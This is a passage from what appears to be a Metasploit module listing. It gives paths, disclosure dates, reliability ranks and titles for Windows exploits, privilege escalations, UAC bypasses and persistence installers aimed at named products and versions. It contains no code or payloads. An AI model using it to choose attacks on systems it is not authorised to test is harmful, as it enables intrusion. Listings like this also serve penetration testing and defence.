Buffer Overflow - windows/http/generic_http_dll_injection 2015-03-04 manual No Generic Web Application DLL Injection - windows/http/geutebrueck_gcore_x64_rce_bo 2017-01-24 normal Yes Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE - windows/http/gitstack_rce 2018-01-15 great No GitStack Unsanitized Argument RCE - windows/http/hp_autopass_license_traversal 2014-01-10 great Yes HP AutoPass License Server File Upload - windows/http/hp_imc_bims_upload 2013-10-08 excellent Yes HP Intelligent Management Center BIMS UploadServlet Directory Traversal - windows/http/hp_imc_java_deserialize 2017-10-03 excellent Yes HP Intelligent Management Java Deserialization RCE - windows/http/hp_imc_mibfileupload 2013-03-07 great Yes HP Intelligent Management Center Arbitrary File Upload - windows/http/hp_loadrunner_copyfiletoserver 2013-10-30 excellent Yes HP LoadRunner EmulationAdmin Web Service Directory Traversal - windows/http/hp_mpa_job_acct 2011-12-21 excellent Yes HP Managed Printing Administration jobAcct Remote Command Execution - windows/http/hp_nnm_getnnmdata_hostname 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow - windows/http/hp_nnm_getnnmdata_icount 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow - windows/http/hp_nnm_getnnmdata_maxage 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow - windows/http/hp_nnm_nnmrptconfig_nameparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig nameParams Buffer Overflow - windows/http/hp_nnm_nnmrptconfig_schdparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow - windows/http/hp_nnm_openview5 2007-12-06 great No HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow - windows/http/hp_nnm_ovalarm_lang 2009-12-09 great No HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow - windows/http/hp_nnm_ovas 2008-04-02 good Yes HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow - windows/http/hp_nnm_ovbuildpath_textfile 2011-11-01 normal No HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow - windows/http/hp_nnm_ovwebhelp 2009-12-09 great No HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow - windows/http/hp_nnm_ovwebsnmpsrv_main 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow - windows/http/hp_nnm_ovwebsnmpsrv_ovutil 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow - windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow - windows/http/hp_nnm_snmp 2009-12-09 great No HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow - windows/http/hp_nnm_snmpviewer_actapp 2010-05-11 great No HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow - windows/http/hp_nnm_toolbar_01 2009-01-07 great No HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow - windows/http/hp_nnm_toolbar_02 2009-01-21 normal No HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow - windows/http/hp_nnm_webappmon_execvp 2010-07-20 great No HP OpenView Network Node Manager execvp_nc Buffer Overflow - windows/http/hp_nnm_webappmon_ovjavalocale 2010-08-03 great No HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow - windows/http/hp_openview_insight_backdoor 2011-01-31 excellent No HP OpenView Performance Insight Server Backdoor Account Code Execution - windows/http/hp_pcm_snac_update_certificates 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload - windows/http/hp_pcm_snac_update_domain 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload - windows/http/hp_power_manager_filename 2011-10-19 normal No HP Power Manager 'formExportDataLogs' Buffer Overflow - windows/http/hp_power_manager_login 2009-11-04 average No Hewlett-Packard Power Manager Administration Buffer Overflow - windows/http/hp_sitescope_dns_tool 2015-10-09 good No HP SiteScope DNS Tool Command Injection - windows/http/hp_sitescope_runomagentcommand 2013-07-29 manual Yes HP SiteScope Remote Code Execution - windows/http/httpdx_handlepeer 2009-10-08 great Yes HTTPDX h_handlepeer() Function Buffer Overflow - windows/http/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability - windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow - windows/http/ibm_tivoli_endpoint_bof 2011-05-31 good No IBM Tivoli Endpoint Manager POST Query Buffer Overflow - windows/http/ibm_tpmfosd_overflow 2007-05-02 good No IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow - windows/http/ibm_tsm_cad_header 2007-09-24 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow - windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite - windows/http/integard_password_bof 2010-09-07 great No Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow - windows/http/intersystems_cache 2009-09-29 great No InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow - windows/http/intrasrv_bof 2013-05-30 manual Yes Intrasrv 1.0 Buffer Overflow - windows/http/ipswitch_wug_maincfgret 2004-08-25 great No Ipswitch WhatsUp Gold 8.03 Buffer Overflow - windows/http/jira_collector_traversal 2014-02-26 normal Yes JIRA Issues Collector Directory Traversal - windows/http/kaseya_uploader 2015-09-23 excellent Yes Kaseya VSA uploader.aspx Arbitrary File Upload - windows/http/kaseya_uploadimage_file_upload 2013-11-11 excellent Yes Kaseya uploadImage Arbitrary File Upload - windows/http/kolibri_http 2010-12-26 good Yes Kolibri HTTP Server HEAD Buffer Overflow - windows/http/landesk_thinkmanagement_upload_asp 2012-02-15 excellent No LANDesk Lenovo ThinkManagement Console Remote Command Execution - windows/http/lexmark_markvision_gfd_upload 2014-12-09 excellent Yes Lexmark MarkVision Enterprise Arbitrary File Upload - windows/http/mailenable_auth_header 2005-04-24 great Yes MailEnable Authorization Header Buffer Overflow - windows/http/manage_engine_opmanager_rce 2015-09-14 manual Yes ManageEngine OpManager Remote Code Execution - windows/http/manageengine_adshacluster_rce 2018-06-28 excellent Yes Manage Engine Exchange Reporter Plus Unauthenticated RCE - windows/http/manageengine_appmanager_exec 2018-03-07 excellent Yes ManageEngine Applications Manager Remote Code Execution - windows/http/manageengine_apps_mngr 2011-04-08 average No ManageEngine Applications Manager Authenticated Code Execution - windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability - windows/http/maxdb_webdbm_database 2006-08-29 good No MaxDB WebDBM Database Parameter Overflow - windows/http/maxdb_webdbm_get_overflow 2005-04-26 good No MaxDB WebDBM GET Buffer Overflow - windows/http/mcafee_epolicy_source 2006-07-17 average Yes McAfee ePolicy Orchestrator / ProtectionPilot Overflow - windows/http/mdaemon_worldclient_form2raw 2003-12-29 great Yes MDaemon WorldClient form2raw.cgi Stack Buffer Overflow - windows/http/minishare_get_overflow 2004-11-07 average No Minishare 1.4.1 Buffer Overflow - windows/http/miniweb_upload_wbem 2013-04-09 excellent Yes MiniWeb (Build 300) Arbitrary File Upload - windows/http/navicopa_get_overflow 2006-09-28 great Yes NaviCOPA 2.0.1 URL Handling Buffer Overflow - windows/http/netdecision_http_bof 2012-02-24 normal Yes NetDecision 4.5.1 HTTP Server Buffer Overflow - windows/http/netgear_nms_rce 2016-02-04 excellent Yes NETGEAR ProSafe Network Management System 300 Arbitrary File Upload - windows/http/novell_imanager_upload 2010-10-01 excellent No Novell iManager getMultiPartParameters Arbitrary File Upload - windows/http/novell_mdm_lfi 2013-03-13 excellent Yes Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability - windows/http/novell_messenger_acceptlang 2006-04-13 average No Novell Messenger Server 2.0 Accept-Language Overflow - windows/http/nowsms 2008-02-19 good No Now SMS/MMS Gateway Buffer Overflow - windows/http/octopusdeploy_deploy 2017-05-15 excellent Yes Octopus Deploy Authenticated Code Execution - windows/http/oracle9i_xdb_pass 2003-08-18 great Yes Oracle 9i XDB HTTP PASS Overflow (win32) - windows/http/oracle_beehive_evaluation 2010-06-09 excellent Yes Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability - windows/http/oracle_beehive_prepareaudiotoplay 2015-11-10 excellent Yes Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload - windows/http/oracle_btm_writetofile 2012-08-07 excellent No Oracle Business Transaction Management FlashTunnelService Remote Code Execution - windows/http/oracle_endeca_exec 2013-07-16 excellent Yes Oracle Endeca Server Remote Command Execution - windows/http/oracle_event_processing_upload 2014-04-21 excellent Yes Oracle Event Processing FileUploadServlet Arbitrary File Upload - windows/http/osb_uname_jlist 2010-07-13 excellent No Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability - windows/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow - windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow - windows/http/privatewire_gateway 2006-06-26 average No Private Wire Gateway Buffer Overflow - windows/http/psoproxy91_overflow 2004-02-20 average Yes PSO Proxy v0.91 Stack Buffer Overflow - windows/http/rabidhamster_r4_log 2012-02-09 normal Yes RabidHamster R4 Log Entry sprintf() Buffer Overflow - windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution - windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow - windows/http/sap_configservlet_exec_noauth 2012-11-01 great Yes SAP ConfigServlet Remote Code Execution - windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection - windows/http/sapdb_webtools 2007-07-05 great No SAP DB 7.4 WebTools Buffer Overflow - windows/http/savant_31_overflow 2002-09-10 great Yes Savant 3.1 Web Server Overflow - windows/http/sepm_auth_bypass_rce 2015-07-31 excellent No Symantec Endpoint Protection Manager Authentication Bypass and Code Execution - windows/http/serviio_checkstreamurl_cmd_exec 2017-05-03 excellent Yes Serviio Media Server checkStreamUrl Command Execution - windows/http/servu_session_cookie 2009-11-01 good Yes Rhinosoft Serv-U Session Cookie Buffer Overflow - windows/http/shoutcast_format 2004-12-23 average Yes SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow - windows/http/shttpd_post 2006-10-06 average No SHTTPD URI-Encoded POST Request Overflow - windows/http/solarwinds_fsm_userlogin 2015-03-13 excellent Yes Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability - windows/http/solarwinds_storage_manager_sql 2011-12-07 excellent Yes Solarwinds Storage Manager 5.1.0 SQL Injection - windows/http/sonicwall_scrutinizer_sqli 2012-07-22 excellent Yes Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection - windows/http/steamcast_useragent 2008-01-24 average Yes Streamcast HTTP User-Agent Buffer Overflow - windows/http/sws_connection_bof 2012-07-20 normal Yes Simple Web Server Connection Header Buffer Overflow - windows/http/sybase_easerver 2005-07-25 average No Sybase EAServer 5.2 Remote Stack Buffer Overflow - windows/http/syncbreeze_bof 2017-03-15 great Yes Sync Breeze Enterprise GET Buffer Overflow - windows/http/sysax_create_folder 2012-07-29 normal No Sysax Multi Server 5.64 Create Folder Buffer Overflow - windows/http/trackercam_phparg_overflow 2005-02-18 average Yes TrackerCam PHP Argument Buffer Overflow - windows/http/trackit_file_upload 2014-10-07 excellent Yes Numara / BMC Track-It! FileStorageService Arbitrary File Upload - windows/http/trendmicro_officescan 2007-06-28 good No Trend Micro OfficeScan Remote Stack Buffer Overflow - windows/http/trendmicro_officescan_widget_exec 2017-10-07 excellent Yes Trend Micro OfficeScan Remote Code Execution - windows/http/ultraminihttp_bof 2013-07-10 normal No Ultra Mini HTTPD Stack Buffer Overflow - windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution - windows/http/vmware_vcenter_chargeback_upload 2013-05-15 excellent Yes VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload - windows/http/vxsrchs_bof 2017-03-15 great Yes VX Search Enterprise GET Buffer Overflow - windows/http/webster_http 2002-12-02 average No Webster HTTP Server GET Buffer Overflow - windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP Upload - windows/http/xitami_if_mod_since 2007-09-24 average Yes Xitami 2.5c2 Web Server If-Modified-Since Overflow - windows/http/zenworks_assetmgmt_uploadservlet 2011-11-02 excellent No Novell ZENworks Asset Management Remote Execution - windows/http/zenworks_uploadservlet 2010-03-30 excellent No Novell ZENworks Configuration Management Remote Execution - windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow - windows/iis/iis_webdav_upload_asp 1994-01-01 excellent No Microsoft IIS WebDAV Write Access Code Execution - windows/iis/ms01_023_printer 2001-05-01 good Yes MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow - windows/iis/ms01_026_dbldecode 2001-05-15 excellent Yes MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution - windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow - windows/iis/ms02_018_htr 2002-04-10 good No MS02-018 Microsoft IIS 4.0 .HTR Path Overflow - windows/iis/ms02_065_msadc 2002-11-20 normal Yes MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow - windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow - windows/iis/msadc 1998-07-17 excellent Yes MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution - windows/imap/eudora_list 2005-12-20 great Yes Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow - windows/imap/imail_delete 2004-11-12 average No IMail IMAP4D Delete Overflow - windows/imap/ipswitch_search 2007-07-18 average No Ipswitch IMail IMAP SEARCH Buffer Overflow - windows/imap/mailenable_login 2006-12-11 great No MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow - windows/imap/mailenable_status 2005-07-13 great No MailEnable IMAPD (1.54) STATUS Request Buffer Overflow - windows/imap/mailenable_w3c_select 2005-10-03 great Yes MailEnable IMAPD W3C Logging Buffer Overflow - windows/imap/mdaemon_cram_md5 2004-11-12 great No Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow - windows/imap/mdaemon_fetch 2008-03-13 great Yes MDaemon 9.6.4 IMAPD FETCH Buffer Overflow - windows/imap/mercur_imap_select_overflow 2006-03-17 average No Mercur v5.0 IMAP SP3 SELECT Buffer Overflow - windows/imap/mercur_login 2006-03-17 average No Mercur Messaging 2005 IMAP Login Buffer Overflow - windows/imap/mercury_login 2007-03-06 normal Yes Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow - windows/imap/mercury_rename 2004-11-29 average Yes Mercury/32 v4.01a IMAP RENAME Buffer Overflow - windows/imap/novell_netmail_append 2006-12-23 average No Novell NetMail IMAP APPEND Buffer Overflow - windows/imap/novell_netmail_auth 2007-01-07 average No Novell NetMail IMAP AUTHENTICATE Buffer Overflow - windows/imap/novell_netmail_status 2005-11-18 average No Novell NetMail IMAP STATUS Buffer Overflow - windows/imap/novell_netmail_subscribe 2006-12-23 average No Novell NetMail IMAP SUBSCRIBE Buffer Overflow - windows/isapi/ms00_094_pbserver 2000-12-04 good Yes MS00-094 Microsoft IIS Phone Book Service Overflow - windows/isapi/ms03_022_nsiislog_post 2003-06-25 good Yes MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow - windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Yes MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow - windows/isapi/rsa_webagent_redirect 2005-10-21 good Yes Microsoft IIS ISAPI RSA WebAgent Redirect Overflow - windows/isapi/w3who_query 2004-12-06 good Yes Microsoft IIS ISAPI w3who.dll Query String Overflow - windows/ldap/imail_thc 2004-02-17 average No IMail LDAP Service Buffer Overflow - windows/ldap/pgp_keyserver7 2001-07-16 good No Network Associates PGP KeyServer 7 LDAP Buffer Overflow - windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow - windows/license/calicserv_getconfig 2005-03-02 normal Yes Computer Associates License Server GETCONFIG Overflow - windows/license/flexnet_lmgrd_bof 2012-03-23 normal No FlexNet License Server Manager lmgrd Buffer Overflow - windows/license/sentinel_lm7_udp 2005-03-07 average Yes SentinelLM UDP Buffer Overflow - windows/local/adobe_sandbox_adobecollabsync 2013-05-14 great Yes AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass - windows/local/agnitum_outpost_acs 2013-08-02 excellent Yes Agnitum Outpost Internet Security Local Privilege Escalation - windows/local/alpc_taskscheduler 2018-08-27 normal No Microsoft Windows ALPC Task Scheduler Local Privilege Elevation - windows/local/always_install_elevated 2010-03-18 excellent Yes Windows AlwaysInstallElevated MSI - windows/local/applocker_bypass 2015-08-03 excellent No AppLocker Execution Prevention Bypass - windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs - windows/local/bthpan 2014-07-18 average Yes MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation - windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass - windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) - windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) - windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) - windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) - windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS - windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) - windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) - windows/local/capcom_sys_exec 1999-01-01 normal Yes Windows Capcom.sys Kernel Execution Exploit (x64 only) - windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token - windows/local/cve_2017_8464_lnk_lpe 2017-06-13 excellent Yes LNK Code Execution Vulnerability - windows/local/ikeext_service 2012-10-09 good Yes IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL - windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation - windows/local/lenovo_systemupdate 2015-04-12 excellent Yes Lenovo System Update Privilege Escalation - windows/local/mov_ss 2018-05-08 excellent No Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability - windows/local/mqac_write 2014-07-22 average Yes MQAC.sys Arbitrary Write Privilege Escalation - windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D - windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation - windows/local/ms11_080_afdjoinleaf 2011-11-30 average No MS11-080 AfdJoinLeaf Privilege Escalation - windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation - windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) - windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page - windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape - windows/local/ms14_009_ie_dfsvc 2014-02-11 great Yes MS14-009 .NET Deployment Service IE Sandbox Escape - windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference - windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference - windows/local/ms15_004_tswbproxy 2015-01-13 good Yes MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape - windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit - windows/local/ms15_078_atmfd_bof 2015-07-11 manual Yes MS15-078 Microsoft Windows Font Driver Buffer Overflow - windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Recieve Notification Exploit - windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation - windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation - windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC - windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy) - windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference - windows/local/ms_ndproxy 2013-11-27 average Yes MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation - windows/local/novell_client_nicm 2013-05-22 average Yes Novell Client 2 SP3 nicm.sys Local Privilege Escalation - windows/local/novell_client_nwfs 2008-06-26 average No Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation - windows/local/ntapphelpcachecontrol 2014-09-30 normal Yes MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check - windows/local/nvidia_nvsvc 2012-12-25 average Yes Nvidia (nvsvc) Display Driver Service Local Privilege Escalation - windows/local/panda_psevents 2016-06-27 excellent Yes Panda Security PSEvents Privilege Escalation - windows/local/payload_inject 2011-10-12 excellent No Windows Manage Memory Payload Injection - windows/local/persistence 2011-10-19 excellent No Windows Persistent Registry Startup Payload Installer - windows/local/persistence_service 2018-10-20 excellent No Windows Persistent Service Installer - windows/local/powershell_cmd_upgrade 1999-01-01 excellent No Windows Command Shell Upgrade (Powershell) - windows/local/powershell_remoting 1999-01-01 excellent No Powershell Remoting Remote Command Execution - windows/local/ppr_flatten_rec 2013-05-15 average Yes Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation - windows/local/ps_persist 2012-08-14 excellent No Powershell Payload Execution - windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell - windows/local/pxeexploit 2011-08-05 excellent No PXE Exploit Server - windows/local/razer_zwopenprocess 2017-03-22 normal Yes Razer Synapse rzpnk.sys ZwOpenProcess - windows/local/registry_persistence 2015-07-01 excellent Yes Windows Registry Only Persistence - windows/local/run_as 1999-01-01 excellent No Windows Run Command As User - windows/local/s4u_persistence 2013-01-02 excellent No Windows Manage User Level Persistent Payload Installer - windows/local/service_permissions 2012-10-15 great No Windows Escalate Service Permissions Local Privilege Escalation - windows/local/trusted_service_path 2001-10-25 excellent Yes Windows Service Trusted Path Privilege Escalation - windows/local/virtual_box_guest_additions 2014-07-15 average Yes VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation - windows/local/virtual_box_opengl_escape 2014-03-11 average Yes VirtualBox 3D Acceleration Virtual Machine Escape - windows/local/vss_persistence 2011-10-21 excellent No Persistent Payload in Windows Volume Shadow Copy - windows/local/webexec 2018-10-09 good Yes WebEx Local Service Permissions Exploit - windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution - windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence - windows/lotus/domino_http_accept_language 2008-05-20 average No IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow - windows/lotus/domino_icalendar_organizer 2010-09-14 normal Yes IBM Lotus Domino iCalendar MAILTO Buffer Overflow - windows/lotus/domino_sametime_stmux 2008-05-21 average Yes IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow - windows/lotus/lotusnotes_lzh 2011-05-24 normal No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) - windows/lpd/hummingbird_exceed 2005-05-27 average No Hummingbird Connectivity 10 SP5 LPD Buffer Overflow - windows/lpd/niprint 2003-11-05 good No NIPrint LPD Request Overflow - windows/lpd/saplpd 2008-02-04 good No SAP SAPLPD 6.28 Buffer Overflow - windows/lpd/wincomlpd_admin 2008-02-04 good No WinComLPD Buffer Overflow - windows/misc/achat_bof 2014-12-18 normal No Achat Unicode SEH Buffer Overflow - windows/misc/actfax_raw_server_bof 2013-02-05 normal No ActFax 5.01 RAW Server Buffer Overflow - windows/misc/agentxpp_receive_agentx 2010-04-16 good No AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow - windows/misc/allmediaserver_bof 2012-07-04 normal No ALLMediaServer 0.8 Buffer Overflow - windows/misc/altiris_ds_sqli 2008-05-15 normal Yes Symantec Altiris DS SQL Injection - windows/misc/apple_quicktime_rtsp_response 2007-11-23 normal No Apple QuickTime 7.3 RTSP Response Header Buffer Overflow - windows/misc/asus_dpcproxy_overflow 2008-03-21 average No Asus Dpcproxy Buffer Overflow - windows/misc/avaya_winpmd_unihostrouter 2011-05-23 normal No Avaya WinPMD UniteHostRouter Buffer Overflow - windows/misc/avidphoneticindexer 2011-11-29 normal No Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow - windows/misc/bakbone_netvault_heap 2005-04-01 average Yes BakBone NetVault Remote Heap Overflow - windows/misc/bcaaa_bof 2011-04-04 good No Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow - windows/misc/bigant_server 2008-04-15 average No BigAnt Server 2.2 Buffer Overflow - windows/misc/bigant_server_250 2008-04-15 great No BigAnt Server 2.50 SP1 Buffer Overflow - windows/misc/bigant_server_dupf_upload 2013-01-09 excellent No BigAnt Server DUPF Command Arbitrary File Upload - windows/misc/bigant_server_sch_dupf_bof 2013-01-09 normal No BigAnt Server 2 SCH And DUPF Buffer Overflow - windows/misc/bigant_server_usv 2009-12-29 great No BigAnt Server 2.52 USV Buffer Overflow - windows/misc/bomberclone_overflow 2006-02-16 average No Bomberclone 0.11.6 Buffer Overflow - windows/misc/bopup_comm 2009-06-18 good No Bopup Communications Server Buffer Overflow - windows/misc/borland_interbase 2007-07-24 average No Borland Interbase Create-Request Buffer Overflow - windows/misc/borland_starteam 2008-04-02 average No Borland CaliberRM StarTeam Multicast Service Buffer Overflow - windows/misc/citrix_streamprocess 2011-01-20 good No Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow - windows/misc/citrix_streamprocess_data_msg 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow - windows/misc/citrix_streamprocess_get_boot_record_request 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow - windows/misc/citrix_streamprocess_get_footer 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow - windows/misc/citrix_streamprocess_get_objects 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow - windows/misc/cloudme_sync 2018-01-17 great No CloudMe Sync v1.10.9 - windows/misc/commvault_cmd_exec 2017-12-12 good No Commvault Communications Service (cvd) Command Injection - windows/misc/disk_savvy_adm 2017-01-31 great No Disk Savvy Enterprise v10.4.18 - windows/misc/doubletake 2008-06-04 average No DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow - windows/misc/eiqnetworks_esa 2006-07-24 average No eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow - windows/misc/eiqnetworks_esa_topology 2006-07-25 average No eIQNetworks ESA Topology DELETEDEVICE Overflow - windows/misc/enterasys_netsight_syslog_bof 2011-12-19 normal No Enterasys NetSight nssyslogd.exe Buffer Overflow - windows/misc/eureka_mail_err 2009-10-22 normal No Eureka Email 2.2q ERR Remote Buffer Overflow - windows/misc/fb_cnct_group 2013-01-31 normal Yes Firebird Relational Database CNCT Group Number Buffer Overflow - windows/misc/fb_isc_attach_database 2007-10-03 average No Firebird Relational Database isc_attach_database() Buffer Overflow - windows/misc/fb_isc_create_database 2007-10-03 average No Firebird Relational Database isc_create_database() Buffer Overflow - windows/misc/fb_svc_attach 2007-10-03 average No Firebird Relational Database SVC_attach() Buffer Overflow - windows/misc/gh0st 2017-07-27 normal Yes Gh0st Client buffer Overflow - windows/misc/gimp_script_fu 2012-05-18 normal No GIMP script-fu Server Buffer Overflow - windows/misc/hp_dataprotector_cmd_exec 2014-11-02 excellent Yes HP Data Protector 8.10 Remote Command Execution - windows/misc/hp_dataprotector_crs 2013-06-03 normal Yes HP Data Protector Cell Request Service Buffer Overflow - windows/misc/hp_dataprotector_dtbclslogin 2010-09-09 normal Yes HP Data Protector DtbClsLogin Buffer Overflow - windows/misc/hp_dataprotector_encrypted_comms 2016-04-18 normal Yes HP Data Protector Encrypted Communication Remote Command Execution - windows/misc/hp_dataprotector_exec_bar 2014-01-02 excellent Yes HP Data Protector Backup Client Service Remote Code Execution - windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service - windows/misc/hp_dataprotector_new_folder 2012-03-12 normal No HP Data Protector Create New Folder Buffer Overflow - windows/misc/hp_dataprotector_traversal 2014-01-02 great Yes HP Data Protector Backup Client Service Directory Traversal - windows/misc/hp_imc_dbman_restartdb_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestartDB Unauthenticated RCE - 